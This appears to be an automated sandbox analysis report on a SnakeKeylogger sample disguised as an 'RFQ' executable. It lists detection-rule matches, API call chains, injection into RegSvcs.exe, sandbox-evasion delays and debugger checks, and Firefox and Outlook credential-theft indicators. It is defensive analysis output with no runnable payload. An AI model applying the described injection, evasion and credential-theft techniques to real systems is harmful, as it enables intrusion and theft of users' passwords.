                  Source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: DEC 2024 RFQ.exe PID: 7492, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/4@3/3
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008A06A GetLastError,FormatMessageW,0_2_0008A06A
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000781CB AdjustTokenPrivileges,CloseHandle,0_2_000781CB
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_000787E1
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0008B333
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0009EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0009EE0D
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0008C397
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00024E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00024E89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | File created: C:\Users\user\AppData\Local\Temp\aut9F17.tmp
                  Source: DEC 2024 RFQ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: DEC 2024 RFQ.exe | ReversingLabs: Detection: 39%
                  Source: unknown | Process created: C:\Users\user\Desktop\DEC 2024 RFQ.exe "C:\Users\user\Desktop\DEC 2024 RFQ.exe"
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\DEC 2024 RFQ.exe"
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: wsock32.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: mpr.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: iconcodecservice.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: DEC 2024 RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: DEC 2024 RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: DEC 2024 RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: DEC 2024 RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: DEC 2024 RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: DEC 2024 RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: DEC 2024 RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: DEC 2024 RFQ.exe, 00000000.00000003.1681597343.0000000004290000.00000004.00001000.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1681428891.00000000040F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: DEC 2024 RFQ.exe, 00000000.00000003.1681597343.0000000004290000.00000004.00001000.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1681428891.00000000040F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: DEC 2024 RFQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: DEC 2024 RFQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: DEC 2024 RFQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: DEC 2024 RFQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: DEC 2024 RFQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_00024B37 LoadLibraryA,GetProcAddress,0_2_00024B37
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008848F push FFFFFF8Bh; iretd 0_2_00088491
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0004E70F push edi; ret 0_2_0004E711
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0004E828 push esi; ret 0_2_0004E82A
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_00048945 push ecx; ret 0_2_00048958
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0004EA03 push esi; ret 0_2_0004EA05
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0004EAEC push edi; ret 0_2_0004EAEE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00E99C30 push esp; retf 0113h 1_2_00E99D55
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00E92398 push edi; iretd 1_2_00E923BE
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_000248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_000248D7
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_000A5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_000A5376
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_00043187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00043187
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | API/Special instruction interceptor: Address: 173C444
                  Source: DEC 2024 RFQ.exe, 00000000.00000003.1666453279.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664147145.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664322405.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1666971979.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1665224245.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1666649288.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664422494.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1664676808.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1665689565.0000000001750000.00000004.00000020.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1666154606.0000000001750000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599435
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599329
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599204
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599079
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598954
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 8240
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 1584
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-101811
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | API coverage: 4.8 %
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0008445A
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008C6D1 FindFirstFileW,FindClose,0_2_0008C6D1
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0008C75C
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0008EF95
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0008F0F2
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0008F3F3
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_000837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_000837EF
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_00083B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00083B12
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0008BCBC
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_000249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000249A0
                  Source: RegSvcs.exe, 00000001.00000002.4149426498.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeAPI call chain: ExitProcess graph end nodegraph_0-100609
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeAPI call chain: ExitProcess graph end nodegraph_0-100828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06589548 LdrInitializeThunk,LdrInitializeThunk,1_2_06589548
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00093F09 BlockInput,0_2_00093F09
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00023B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00023B3A
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00055A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00055A7C
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00024B37 LoadLibraryA,GetProcAddress,0_2_00024B37
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0173B060 mov eax, dword ptr fs:[00000030h]0_2_0173B060
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0173C710 mov eax, dword ptr fs:[00000030h]0_2_0173C710
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0173C6B0 mov eax, dword ptr fs:[00000030h]0_2_0173C6B0
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_000780A9
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0004A124 SetUnhandledExceptionFilter,0_2_0004A124
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0004A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0004A155
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, COVID19.cs | Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A72008
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_000787B1 LogonUserW, 0_2_000787B1
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_00023B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00023B3A
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_000248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_000248D7
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_00084C27 mouse_event, 0_2_00084C27
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\DEC 2024 RFQ.exe"
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_00077CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00077CAF
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0007874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_0007874B
                  Source: DEC 2024 RFQ.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: DEC 2024 RFQ.exe | Binary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0004862B cpuid 0_2_0004862B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_00054E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00054E87
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_00061E06 GetUserNameW, 0_2_00061E06
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_00053F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00053F3A
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_000249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_000249A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
